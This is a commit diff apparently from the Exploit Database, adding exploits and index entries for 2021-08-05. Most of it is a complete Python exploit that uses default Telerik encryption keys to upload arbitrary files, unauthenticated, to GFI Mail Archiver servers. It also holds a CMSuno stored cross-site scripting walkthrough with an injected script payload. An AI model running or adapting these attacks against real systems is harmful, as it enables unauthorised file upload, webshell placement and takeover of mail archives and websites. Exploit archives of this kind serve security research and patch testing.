DB: 2021-08-06

5 changes to exploits/shellcodes Online Doctor Appointment System 1.0 - Multiple Stored XSS Online Doctor Appointment System 1.0 - 'Multiple' Stored XSS CMSuno 1.7 - 'tgo' Stored Cross-Site Scripting (XSS) (Authenticated) Moodle 3.9 - Remote Code Execution (RCE) (Authenticated) GFI Mail Archiver 15.1 - Telerik UI Component Arbitrary File Upload (Unauthenticated)
2021-08-06 05:01:54 +00:00 · 2021-08-06 05:01:54 +00:00 · 9ade177f4f
commit 9ade177f4f
parent 2bcb3e5c5e
6 changed files with 729 additions and 3 deletions
--- a/exploits/multiple/webapps/50181.py
+++ b/exploits/multiple/webapps/50181.py
@ -0,0 +1,350 @@
+# Exploit Title: GFI Mail Archiver 15.1 - Telerik UI Component Arbitrary File Upload (Unauthenticated)
+# Date: 21/03/2021
+# Exploit Author: Amin Bohio
+# Original Research & Code By: Paul Taylor / Foregenix Ltd
+# Original Exploit: https://github.com/bao7uo/RAU_crypto
+# Vendor Homepage: https://www.gfi.com
+# Software Link: https://www.gfi.com/products-and-solutions/network-security-solutions/gfi-archiver
+# Vulnerable Versions: GFI Mail Archiver <= 15.1
+# Component Advisory: https://www.telerik.com/support/kb/aspnet-ajax/upload-(async)/details/unrestricted-file-upload
+# Component Advisory: https://www.telerik.com/support/kb/aspnet-ajax/upload-(async)/details/insecure-direct-object-reference
+# Tested on: Windows & Linux
+
+# Usage: python3 gfipwn.py -u http://[host]/Archiver/ -f filetoupload -p pathonwebserver
+
+#!/usr/bin/python3
+
+# Original Telerik Exploit Author: Paul Taylor / @bao7uo
+# https://github.com/bao7uo/RAU_crypto/blob/master/RAU_crypto.py
+
+# Modified by: Amin Bohio
+
+import sys
+import base64
+import json
+import re
+import requests
+import os
+from Crypto.Cipher import AES
+from Crypto.Hash import HMAC
+from Crypto.Hash import SHA256
+from Crypto.Hash import SHA1
+from struct import Struct
+from operator import xor
+from itertools import starmap
+
+import binascii
+
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+
+#   ******************************************
+#   ******************************************
+
+# ADVANCED_SETTINGS section 1 of 2
+# Warning, the below prevents certificate warnings,
+# and verify = False (CERT_VERIFY prevents them being verified
+
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+
+CERT_VERIFY = False
+
+#   ******************************************
+#   ******************************************
+
+class PBKDF:
+
+    def sha1(v):
+        hl = SHA1.new()
+        hl.update(v)
+        return hl.digest()
+
+    def derive1(password, salt):
+        hash = (password + salt).encode()
+        for i in range(0, 99):
+            hash = PBKDF.sha1(hash)
+
+        result = PBKDF.sha1(hash)
+        i = 1
+        while len(result) < 48:
+            result += PBKDF.sha1(str(i).encode() + hash)
+            i += 1
+
+        return result
+
+    def hmacsha1(v):
+        hl = PBKDF.mac.copy()
+        hl.update(v)
+        return bytearray(hl.digest())
+
+
+    def derive2(password, salt):
+        # Credit: @mitsuhiko https://github.com/mitsuhiko/python-pbkdf2/blob/master/pbkdf2.py
+        result_length = 48
+        PBKDF.mac = HMAC.new(bytes(password.encode()), None, SHA1.new())
+        result = []
+        for b in range(1, -(-result_length // PBKDF.mac.digest_size) + 1):
+            rv = u = PBKDF.hmacsha1(salt.encode() + Struct('>i').pack(b))
+            for i in range(999):
+                u = PBKDF.hmacsha1(u)
+                rv = starmap(xor, zip(rv, u))
+            result.extend(rv)
+        result = b''.join(map(bytes, [result]))[:result_length]
+        return result
+
+    def derive(type, password,salt = ''.join(chr(i) for i in [58, 84, 91, 25, 10, 34, 29, 68, 60, 88, 44, 51, 1])):
+        if type == 1:
+            result = PBKDF.derive1(password, salt)
+            result = result[0:32] + result[8:16] + result[40:48] # Bizarre hack
+        elif type == 2:
+            result = PBKDF.derive2(password, salt)
+
+        return result[0:32], result[32:]
+
+
+class RAUCipher:
+
+
+#   ******************************************
+#   ******************************************
+
+    # ADVANCED_SETTINGS section 2 of 2
+
+    # Default settings are for vulnerable versions before 2017 patches with default keys
+
+    T_Upload_ConfigurationHashKey = \
+        "PrivateKeyForHashOfUploadConfiguration" # Default hardcoded key for versions before 2017 patches
+    HASHKEY = T_Upload_ConfigurationHashKey # or your custom hashkey
+
+    T_AsyncUpload_ConfigurationEncryptionKey = \
+        "PrivateKeyForEncryptionOfRadAsyncUploadConfiguration" # Default hardcoded key for versions before 2017 patches
+    PASSWORD = T_AsyncUpload_ConfigurationEncryptionKey # or your custom password
+
+    # Latest tested version working with this setting: 2018.1.117
+    # Probably working up to and including 2018.3.910
+    PBKDF_ALGORITHM = 1
+
+    # Earliest tested version working with this setting: 2019.2.514
+    # Probably introduced 2019.1.115
+#    PBKDF_ALGORITHM = 2
+
+#   ******************************************
+#   ******************************************
+
+    key, iv = PBKDF.derive(PBKDF_ALGORITHM, PASSWORD)
+
+#    print(binascii.hexlify(key).decode().upper())
+#    print(binascii.hexlify(iv).decode().upper())
+
+    def encrypt(plaintext):
+        sys.stderr.write("Encrypting... ")
+        encoded = ""
+        for i in plaintext:
+            encoded = encoded + i + "\x00"
+        plaintext = encoded + (
+                                chr(16 - (len(encoded) % 16)) *
+                                (16 - (len(encoded) % 16))
+                            )
+        cipher = AES.new(RAUCipher.key, AES.MODE_CBC, RAUCipher.iv)
+        sys.stderr.write("done\n")
+        return base64.b64encode(cipher.encrypt(plaintext.encode())).decode()
+
+
+    def decrypt(ciphertext):
+        sys.stderr.write("Decrypting... ")
+        ciphertext = base64.b64decode(ciphertext)
+        cipher = AES.new(RAUCipher.key, AES.MODE_CBC, RAUCipher.iv)
+        unpad = lambda s: s[0:-ord(chr(s[-1]))]
+        sys.stderr.write("done\n")
+        return unpad(cipher.decrypt(ciphertext)).decode()[0::2]
+
+
+    def addHmac(string, Version):
+
+        isHmacVersion = False
+
+        # "Encrypt-then-MAC" feature introduced in R1 2017
+        # Required for >= "2017.1.118" (e.g. "2017.1.118", "2017.1.228", "2017.2.503" etc.)
+
+        if int(Version[:4]) >= 2017:
+            isHmacVersion = True
+
+        hmac = HMAC.new(
+            bytes(RAUCipher.HASHKEY.encode()),
+            string.encode(),
+            SHA256.new()
+            )
+
+        hmac = base64.b64encode(hmac.digest()).decode()
+        return string + hmac if isHmacVersion else string
+
+
+def getProxy(proxy):
+    return { "http" : proxy, "https" : proxy }
+
+
+def rauPostData_enc(partA, partB):
+    data = "-----------------------------62616f37756f2f\r\n"
+    data += "Content-Disposition: form-data; name=\"rauPostData\"\r\n"
+    data += "\r\n"
+    data += RAUCipher.encrypt(partA) + "&" + RAUCipher.encrypt(partB) + "\r\n"
+    return  data
+
+
+def rauPostData_prep(TempTargetFolder, Version):
+    TargetFolder = RAUCipher.addHmac(
+                                RAUCipher.encrypt(""),
+                                Version
+                                )
+    TempTargetFolder = RAUCipher.addHmac(
+                                RAUCipher.encrypt(TempTargetFolder),
+                                Version
+                                )
+
+    partA = \
+        '{"TargetFolder":"' + TargetFolder + '","TempTargetFolder":"' + \
+        TempTargetFolder + \
+        '","MaxFileSize":0,"TimeToLive":{"Ticks":1440000000000,"Days":0,"Hours":40,"Minutes":0,"Seconds":0,"Milliseconds":0,"TotalDays":1.6666666666666666,"TotalHours":40,"TotalMinutes":2400,"TotalSeconds":144000,"TotalMilliseconds":144000000},"UseApplicationPoolImpersonation":false}'
+
+    partB = \
+        "Telerik.Web.UI.AsyncUploadConfiguration, Telerik.Web.UI, Version=" + \
+        Version + ", Culture=neutral, PublicKeyToken=121fae78165ba3d4"
+    
+    return rauPostData_enc(partA, partB)
+
+
+def payload(TempTargetFolder, Version, payload_filename):
+    sys.stderr.write("Local file path: " + payload_filename + "\n")
+    payload_filebasename = os.path.basename(payload_filename)
+    sys.stderr.write("Destination file name: " + payload_filebasename + "\n")
+    sys.stderr.write("Destination path: " + TempTargetFolder + "\n")
+    sys.stderr.write("Version: " + Version + "\n")
+    sys.stderr.write("Preparing payload... \n")
+    payload_file = open(payload_filename, "rb")
+    payload_file_data = payload_file.read()
+    payload_file.close()
+
+    data = rauPostData_prep(TempTargetFolder, Version)
+    data += "-----------------------------62616f37756f2f\r\n"
+    data += "Content-Disposition: form-data; name=\"file\"; filename=\"blob\"\r\n"
+    data += "Content-Type: application/octet-stream\r\n"
+    data += "\r\n"
+    data += payload_file_data.decode("raw_unicode_escape") + "\r\n"
+    data += "-----------------------------62616f37756f2f\r\n"
+    data += "Content-Disposition: form-data; name=\"fileName\"\r\n"
+    data += "\r\n"
+    data += "RAU_crypto.bypass\r\n"
+    data += "-----------------------------62616f37756f2f\r\n"
+    data += "Content-Disposition: form-data; name=\"contentType\"\r\n"
+    data += "\r\n"
+    data += "text/html\r\n"
+    data += "-----------------------------62616f37756f2f\r\n"
+    data += "Content-Disposition: form-data; name=\"lastModifiedDate\"\r\n"
+    data += "\r\n"
+    data += "2019-01-02T03:04:05.067Z\r\n"
+    data += "-----------------------------62616f37756f2f\r\n"
+    data += "Content-Disposition: form-data; name=\"metadata\"\r\n"
+    data += "\r\n"
+    data += "{\"TotalChunks\":1,\"ChunkIndex\":0,\"TotalFileSize\":1,\"UploadID\":\"" + \
+            payload_filebasename + "\"}\r\n"
+    data += "-----------------------------62616f37756f2f--\r\n"
+    data += "\r\n"
+    sys.stderr.write("Payload prep done\n")
+    return data
+
+
+def upload(data, url, proxy = False):
+
+    global CERT_VERIFY
+
+    sys.stderr.write("Preparing to send request to " + url + "\n")
+    session = requests.Session()
+    request = requests.Request(
+                        "POST",
+                        url,
+                        data=data
+                        )
+    request = request.prepare()
+    request.headers["Content-Type"] = \
+        "multipart/form-data; " +\
+        "boundary=---------------------------62616f37756f2f"
+    response = session.send(request, verify=CERT_VERIFY, proxies = getProxy(proxy))
+    sys.stderr.write("Request done\n")
+    return response.text
+
+
+def decode_rauPostData(rauPostData):
+    rauPostData = rauPostData.split("&")
+    rauJSON = RAUCipher.decrypt(rauPostData[0])
+    decoded = "\nJSON: " + rauJSON + "\n"
+    TempTargetFolder = json.loads(rauJSON)["TempTargetFolder"]
+    decoded = decoded + "\nTempTargetFolder = " + \
+                        RAUCipher.decrypt(TempTargetFolder) + "\n"
+    rauVersion = RAUCipher.decrypt(rauPostData[1])
+    decoded = decoded + "\nVersion: " + rauVersion + "\n"
+    return decoded
+
+
+def mode_decrypt():
+    # decrypt ciphertext
+    ciphertext = sys.argv[2]
+    print("\n" + RAUCipher.decrypt(ciphertext) + "\n")
+
+
+def mode_Decrypt_rauPostData():
+    # decrypt rauPostData
+    rauPostData = sys.argv[2]
+    print(decode_rauPostData(rauPostData))
+
+
+def mode_encrypt():
+    # encrypt plaintext
+    plaintext = sys.argv[2]
+    print("\n" + RAUCipher.encrypt(plaintext) + "\n")
+
+
+def mode_Encrypt_rauPostData():
+    # encrypt rauPostData based on TempTargetFolder and Version
+    TempTargetFolder = sys.argv[2]
+    Version = sys.argv[3]
+    print(
+        "rauPostData: " +
+        rauPostData_prep(TempTargetFolder, Version) +
+        "\n"
+    )
+
+
+def mode_payload():
+    # generate a payload based on TempTargetFolder, Version and payload file
+    TempTargetFolder = sys.argv[2]
+    Version = "2013.1.417.40"
+    payload_filename = sys.argv[4]
+    print("Content-Type: multipart/form-data; boundary=---------------------------62616f37756f2f")
+    print(payload(TempTargetFolder, Version, payload_filename))
+
+
+def mode_Post(proxy = False):
+    # generate and upload a payload based on
+    # TempTargetFolder, Version, payload file and url
+    Version = "2013.1.417.40"
+    url = sys.argv[2] + "/Telerik.Web.UI.WebResource.axd?type=rau"
+    payload_filename = sys.argv[4]
+    TempTargetFolder = sys.argv[6]
+
+    print(upload(payload(TempTargetFolder, Version, payload_filename), url, proxy))
+    print("\n[+] Check your uploaded file\n");
+
+
+def mode_help():
+    print(
+        "Usage: \nExample1: python3 gfipwn.py -u http://[host]/Archiver/ -f filetoupload -p 'C:\\Program Files\\GFI\\Archiver\\ASPNET\\UI\\Images\\' \nExample2: python3 gfipwn.py -u http://[host]/Archiver/ -f filetoupload -p 'C:\\Windows\\Temp'")
+
+
+sys.stderr.write("\n[+] Original Research by Paul Taylor / @bao7uo \n[+] Modified by Amin Bohio\n")
+sys.stderr.write("[+] GFI Mail Archiver <= 15.1 - Telerik Arbitrary File Upload\n\n")
+
+if len(sys.argv) < 2:
+    mode_help()
+elif sys.argv[1] == "-u" and len(sys.argv) == 7:
+    mode_Post()
+else:
+    mode_help()
--- a/exploits/php/webapps/49352.txt
+++ b/exploits/php/webapps/49352.txt
@ -8,7 +8,7 @@
 # Affected Version: Version 1
 # Patched Version: Unpatched
 # Category: Web Application
-# CVE: CVE-2021-25791
+# CVE: CVE-2021-25790

 Step 1: Create a new user then login
 Step 2: Click on "Register" page to register a room.
--- a/exploits/php/webapps/49396.txt
+++ b/exploits/php/webapps/49396.txt
@ -1,10 +1,11 @@
-# Exploit Title: Online Doctor Appointment System  1.0 -  Multiple Stored XSS
+# Exploit Title: Online Doctor Appointment System  1.0 - 'Multiple' Stored XSS
 # Tested on: Windows 10
 # Exploit Author: Mohamed habib Smidi (Craniums)
 # Date: 2021-01-08
 # Vendor Homepage: https://www.sourcecodester.com/php/14663/online-doctor-appointment-system-php-full-source-code.html
 # Software Link: https://www.sourcecodester.com/download-code?nid=14663&title=Online+Doctor+Appointment+System+in+PHP+with+Full+Source+Code
 # Affected Version: Version 1
+# CVE : CVE-2021-25791

 Step 1: Login to the doctor account in http://TARGET/doctorappointmentsystem/adminlogin.php
 Step 2: then Click on the username and go to profile
--- a/exploits/php/webapps/50179.txt
+++ b/exploits/php/webapps/50179.txt
@ -0,0 +1,23 @@
+# Exploit Title: CMSuno 1.7 - 'tgo' Stored Cross-Site Scripting (XSS) (Authenticated)
+# Date: 03-08-2021
+# Exploit Author: splint3rsec
+# Vendor Homepage: https://github.com/boiteasite
+# Software Link: https://github.com/boiteasite/cmsuno
+# Affected Version(s): CMSuno 1.7 (and prior)
+# CVE : CVE-2021-36654
+
+CMSuno version 1.7 and prior is vulnerable to a stored cross-site scripting.
+
+The attacker must be authenticated to exploit the vulnerability.
+
+The payload injection is done while updating the template's image filename, vulnerable parameter is *tgo*
+
+Steps to reproduce:
+
+1. Go to /uno.php and click on *plugins*
+2. Click on *Logo*
+3. Choose a random picture in your files repo, click on save and intercept the request
+4. Edit the POST request to /uno/template/uno1/uno1.php by modifying the tgo parameter's value to ")}</style><script>VULN JS CODE HERE</script>
+5. Forward the request and click on *publish*
+6. Click on *See the website*
+7. XSS
--- a/exploits/php/webapps/50180.py
+++ b/exploits/php/webapps/50180.py
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -43795,7 +43795,7 @@ id,file,description,date,author,type,platform,port
 49392,exploits/php/webapps/49392.txt,"ECSIMAGING PACS 6.21.5 - SQL injection",2021-01-07,shoxxdj,webapps,php,
 49393,exploits/php/webapps/49393.txt,"CRUD Operation 1.0 - Multiple Stored XSS",2021-01-07,"Arnav Tripathy",webapps,php,
 49395,exploits/php/webapps/49395.txt,"Life Insurance Management System 1.0 - Multiple Stored XSS",2021-01-08,"Arnav Tripathy",webapps,php,
-49396,exploits/php/webapps/49396.txt,"Online Doctor Appointment System 1.0 - Multiple Stored XSS",2021-01-08,"Mohamed habib Smidi",webapps,php,
+49396,exploits/php/webapps/49396.txt,"Online Doctor Appointment System 1.0 - 'Multiple' Stored XSS",2021-01-08,"Mohamed habib Smidi",webapps,php,
 49397,exploits/multiple/webapps/49397.txt,"Cockpit Version 234 - Server-Side Request Forgery (Unauthenticated)",2021-01-08,"Metin Yunus Kandemir",webapps,multiple,
 49398,exploits/java/webapps/49398.rb,"Apache Flink 1.11.0 - Unauthenticated Arbitrary File Read (Metasploit)",2021-01-08,"SunCSR Team",webapps,java,
 49399,exploits/php/webapps/49399.rb,"WordPress Plugin Autoptimize 2.7.6 - Authenticated Arbitrary File Upload (Metasploit)",2021-01-08,"SunCSR Team",webapps,php,
@ -44309,3 +44309,6 @@ id,file,description,date,author,type,platform,port
 50176,exploits/php/webapps/50176.txt,"qdPM 9.2 - DB Connection String and Password Exposure (Unauthenticated)",2021-08-04,"Leon Trappett",webapps,php,
 50177,exploits/php/webapps/50177.txt,"Client Management System 1.1 - 'cname' Stored Cross-site scripting (XSS)",2021-08-04,"Mohammad Koochaki",webapps,php,
 50178,exploits/java/webapps/50178.sh,"ApacheOfBiz 17.12.01 - Remote Command Execution (RCE) via Unsafe Deserialization of XMLRPC arguments",2021-08-04,"Adrián Díaz",webapps,java,
+50179,exploits/php/webapps/50179.txt,"CMSuno 1.7 - 'tgo' Stored Cross-Site Scripting (XSS) (Authenticated)",2021-08-05,splint3rsec,webapps,php,
+50180,exploits/php/webapps/50180.py,"Moodle 3.9 - Remote Code Execution (RCE) (Authenticated)",2021-08-05,lanz,webapps,php,
+50181,exploits/multiple/webapps/50181.py,"GFI Mail Archiver 15.1 - Telerik UI Component Arbitrary File Upload (Unauthenticated)",2021-08-05,"Amin Bohio",webapps,multiple,